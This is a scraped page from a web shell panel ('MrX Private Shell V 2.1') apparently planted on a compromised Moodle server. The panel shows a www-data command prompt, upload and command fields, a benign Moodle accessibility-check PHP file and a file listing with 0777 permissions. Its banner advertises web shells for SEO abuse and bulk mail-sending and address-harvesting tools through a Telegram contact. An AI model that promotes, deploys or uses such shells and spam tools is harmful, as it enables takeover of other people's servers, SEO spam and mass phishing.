__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace tool_brickfield\local\htmlchecker\common\checks;

use tool_brickfield\local\htmlchecker\common\brickfield_accessibility_test;

/**
 * Brickfield accessibility HTML checker library.
 *
 * 'i' (italic) element is not used.
 * This error will be generated for all i elements.
 *
 * @package    tool_brickfield
 * @copyright  2020 onward: Brickfield Education Labs, www.brickfield.ie
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
class i_is_not_used extends brickfield_accessibility_test {

    /** @var int The default severity code for this test. */
    public $defaultseverity = \tool_brickfield\local\htmlchecker\brickfield_accessibility::BA_TEST_SEVERE;

    /** @var string The tag this test will fire on. */
    public $tag = 'i';

    /**
     * Check for any i elements and flag them as errors
     * while allowing font awesome icons to be used.
     */
    public function check(): void {
        foreach ($this->get_all_elements('i') as $element) {
            // Ensure this is not a font awesome icon with aria-hidden.
            if (str_contains($element->getAttribute('class'), 'fa-') && $element->getAttribute('aria-hidden') === 'true') {
                continue;
            }
            $this->add_report($element);
        }
    }
}

Filemanager

Name Type Size Permission Actions
a_links_dont_open_new_window.php File 2.68 KB 0777
a_must_contain_text.php File 2.18 KB 0777
a_suspicious_link_text.php File 2.51 KB 0777
area_dont_open_new_window.php File 2.65 KB 0777
area_has_alt_value.php File 1.69 KB 0777
basefont_is_not_used.php File 1.45 KB 0777
blink_is_not_used.php File 1.44 KB 0777
bold_is_not_used.php File 1.44 KB 0777
content_too_long.php File 2.09 KB 0777
css_text_has_contrast.php File 6.86 KB 0777
embed_has_associated_no_embed.php File 2.15 KB 0777
header_h3.php File 1.31 KB 0777
headers_have_text.php File 1.7 KB 0777
i_is_not_used.php File 1.94 KB 0777
img_alt_is_different.php File 1.95 KB 0777
img_alt_is_too_long.php File 1.86 KB 0777
img_alt_not_empty_in_anchor.php File 2.1 KB 0777
img_alt_not_place_holder.php File 2.49 KB 0777
img_has_alt.php File 1.82 KB 0777
img_with_map_has_use_map.php File 2.1 KB 0777
legend_text_not_empty.php File 1.72 KB 0777
marquee_is_not_used.php File 1.45 KB 0777
no_headings.php File 2.29 KB 0777
object_must_have_embed.php File 1.72 KB 0777
object_must_have_title.php File 1.69 KB 0777
object_must_have_valid_title.php File 2.29 KB 0777
strike_is_not_used.php File 1.45 KB 0777
table_data_should_have_th.php File 2.98 KB 0777
table_summary_does_not_duplicate_caption.php File 2.2 KB 0777
table_td_should_not_merge.php File 2.37 KB 0777
table_th_should_have_scope.php File 1.76 KB 0777
Filemanager